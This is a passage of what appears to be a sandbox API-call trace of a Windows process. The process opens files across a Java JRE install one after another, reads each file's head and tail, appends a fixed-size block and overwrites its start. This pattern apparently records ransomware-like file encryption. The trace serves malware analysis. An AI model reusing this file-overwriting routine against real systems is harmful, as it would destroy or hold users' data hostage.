nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.325] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0118.325] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a8048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0118.325] CloseHandle (hObject=0x1f0) returned 1 [0118.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\policytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.327] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.327] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3da8 [0118.327] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.327] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.327] ReleaseMutex (hMutex=0x168) returned 1 [0118.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="policytool.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0118.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="policytool.exe", cchWideChar=14, lpMultiByteStr=0x1f7340c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="policytool.exe", lpUsedDefaultChar=0x0) returned 14 [0118.327] ReadFile (in: hFile=0x1f0, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.330] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2da8 [0118.330] ReadFile (in: hFile=0x1f0, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.349] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2da8 [0118.350] WriteFile (in: hFile=0x1f0, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.351] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0118.351] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.351] CloseHandle (hObject=0x1f0) returned 1 [0118.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.352] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.352] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x9b [0118.352] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.352] ReleaseMutex (hMutex=0x168) returned 1 [0118.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.properties", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0118.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.properties", cchWideChar=24, lpMultiByteStr=0x1f8fcfc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.properties", lpUsedDefaultChar=0x0) returned 24 [0118.352] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e97fa8, nNumberOfBytesToRead=0x9b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e97fa8*, lpNumberOfBytesRead=0x311f2bc*=0x9b, lpOverlapped=0x0) returned 1 [0118.354] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0118.354] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x623, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x623, lpOverlapped=0x0) returned 1 [0118.354] CloseHandle (hObject=0x1f0) returned 1 [0118.354] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.358] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.358] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4302a [0118.358] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.358] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.358] ReleaseMutex (hMutex=0x168) returned 1 [0118.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PYCC.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0118.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PYCC.pf", cchWideChar=7, lpMultiByteStr=0x1f7ac9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PYCC.pf", lpUsedDefaultChar=0x0) returned 7 [0118.359] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.371] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4202a [0118.371] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.377] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4202a [0118.378] WriteFile (in: hFile=0x1f0, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.378] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0118.378] WriteFile (in: hFile=0x1f0, lpBuffer=0x28ad9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.378] CloseHandle (hObject=0x1f0) returned 1 [0118.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.380] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.380] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe10 [0118.380] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.380] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.381] ReleaseMutex (hMutex=0x168) returned 1 [0118.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_es.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0118.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_es.properties", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_es.properties", lpUsedDefaultChar=0x0) returned 22 [0118.381] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f2bc*=0xe10, lpOverlapped=0x0) returned 1 [0118.405] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0118.405] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1398, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x311f2d0*=0x1398, lpOverlapped=0x0) returned 1 [0118.406] CloseHandle (hObject=0x1f0) returned 1 [0118.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.407] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.407] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xea8 [0118.407] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.407] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.407] ReleaseMutex (hMutex=0x168) returned 1 [0118.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_HK.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0118.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_HK.properties", cchWideChar=25, lpMultiByteStr=0x1f8fcfc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_HK.properties", lpUsedDefaultChar=0x0) returned 25 [0118.407] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea9bb8, nNumberOfBytesToRead=0xea8, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea9bb8*, lpNumberOfBytesRead=0x311f2bc*=0xea8, lpOverlapped=0x0) returned 1 [0118.415] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0118.415] WriteFile (in: hFile=0x1f0, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x311f2d0*=0x1430, lpOverlapped=0x0) returned 1 [0118.415] CloseHandle (hObject=0x1f0) returned 1 [0118.416] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.577] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.577] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x33d [0118.577] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.577] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.577] ReleaseMutex (hMutex=0x168) returned 1 [0118.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x1f7360c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meta-index", lpUsedDefaultChar=0x0) returned 10 [0118.577] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x33d, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x311f2bc*=0x33d, lpOverlapped=0x0) returned 1 [0118.583] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0118.583] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x8c5, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x311f2d0*=0x8c5, lpOverlapped=0x0) returned 1 [0118.583] CloseHandle (hObject=0x1f0) returned 1 [0118.583] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.584] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.584] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x28ef [0118.584] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.584] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.584] ReleaseMutex (hMutex=0x168) returned 1 [0118.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.properties.src", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0118.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.properties.src", cchWideChar=25, lpMultiByteStr=0x1f8fcfc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontconfig.properties.src", lpUsedDefaultChar=0x0) returned 25 [0118.585] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.593] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x18ef [0118.593] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.612] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x18ef [0118.612] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.612] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0118.612] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.613] CloseHandle (hObject=0x1f0) returned 1 [0118.613] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.618] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.618] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3b40c [0118.618] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.618] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.618] ReleaseMutex (hMutex=0x168) returned 1 [0118.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterRegular.ttf", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0118.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterRegular.ttf", cchWideChar=27, lpMultiByteStr=0x1f8fc6c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaTypewriterRegular.ttf", lpUsedDefaultChar=0x0) returned 27 [0118.618] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.638] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3a40c [0118.638] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.666] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3a40c [0118.666] WriteFile (in: hFile=0x1f0, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.666] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0118.666] WriteFile (in: hFile=0x1f0, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.667] CloseHandle (hObject=0x1f0) returned 1 [0118.733] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0118.737] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.737] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x93 [0118.737] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.737] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.737] ReleaseMutex (hMutex=0x168) returned 1 [0118.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0118.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x1f88ba4, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_MoveDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0118.737] ReadFile (in: hFile=0x208, lpBuffer=0x1f6ea78, nNumberOfBytesToRead=0x93, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f6ea78*, lpNumberOfBytesRead=0x311f2bc*=0x93, lpOverlapped=0x0) returned 1 [0118.739] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0118.739] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x61b, lpOverlapped=0x0) returned 1 [0118.739] CloseHandle (hObject=0x208) returned 1 [0118.739] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar" (normalized: "c:\\program 